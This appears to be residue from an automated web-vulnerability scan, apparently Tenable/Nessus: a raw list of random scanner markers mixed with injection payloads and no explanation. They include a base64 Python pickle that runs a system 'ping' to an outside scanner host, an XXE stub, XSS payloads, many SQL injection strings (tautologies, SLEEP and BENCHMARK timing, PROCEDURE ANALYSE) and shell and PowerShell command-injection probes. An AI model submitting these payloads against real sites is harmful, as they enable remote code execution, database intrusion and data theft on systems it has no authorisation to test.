gAJjb3MKc3lzdGVtCnEAWEgAAABwaW5nIHJyYmw0cmEydjRidzRzZnpsNWI3bDV1dWYyb3dibnVrc2gyM2V2ZTR4Ym81amJ3Y3libmEud2FzLm5lc3N1cy5vcmdxAYVxAlJxAy4=
nessus_was_textgex6mmrg
mdxtelecom.com.br@73fc2a27-216c-4de5-be27-ae14b531769c.com
nessus_was_textmtb23og9
nessus_was_textvh4xcrc5
nessus_was_textbidmcu41
<!DOCTYPE test []>&xxe;
nessus_was_textvb13x7uk
nessus_was_textbv65ryk2
Version:|Vendor:
nessus_was_textdiyb7bfg
nessus_was_text8us5899t
nessus_was_textj6xonl7q
window.top._tenable_wasscan_js_namespace_taint_tracer.log_execution_flow_sink()
wasxsscontext4d0z3s
nessus_was_textwpkt4ryq script:;tenable_wasscan_xss_in_element_event=73fc2a27-216c-4de5-be27-ae14b531769c//
https://xssrctTnNNdne.was.tenable.com
nessus_was_textt98iyvxi
abcd
nessus_was_textvmr1mvao
nessus_was_text16woebfa
nessus_was_texthh43z9fu
-1756
nessus_was_textz2yfaou4
-1839′ or ‘1839’=’1839
nessus_was_text46uzsg2h
-1839
10001839′ or ‘1839’=’1839
nessus_was_textztqj33e4
1′ limit 0, 1386 —
nessus_was_text5xuv2oro
1386a
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
10002’+(select ‘1’,’2′)+’1
nessus_was_textqefgsft1
10002
1 procedure analyse()– +
-1756′ or ‘1756’=’1756′ — +
nessus_was_text1936f9id
nessus_was_text611xsbhc
-1756
sleep 4
nessus_was_textahkd6zn6
`sleep 4`
nessus_was_text4ntn5szx
nessus_was_textkitrgrkl
||powershell -nop -c “& {sleep (4 – 1)}”
sleep(4);
sleep 4
nessus_was_text3u9kc7rr AND (SELECT 6936 FROM (SELECT(SLEEP(2)))IZCFr)
nessus_was_textbzgvoc8i” AND (SELECT 6936 FROM (SELECT(SLEEP(2)))IZCFr) AND “IZCFr”=”IZCFr
nessus_was_textqbtx3em4
nessus_was_text8381p54u
nessus_was_text7po6189a
PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT(0x5c,(BENCHMARK(2*7000000,MD5(1))))),1)– –
nessus_was_textajqnfiqm
nessus_was_text1setnes4
nessus_was_textp3vgc97q
nessus_was_text4wk1b4j5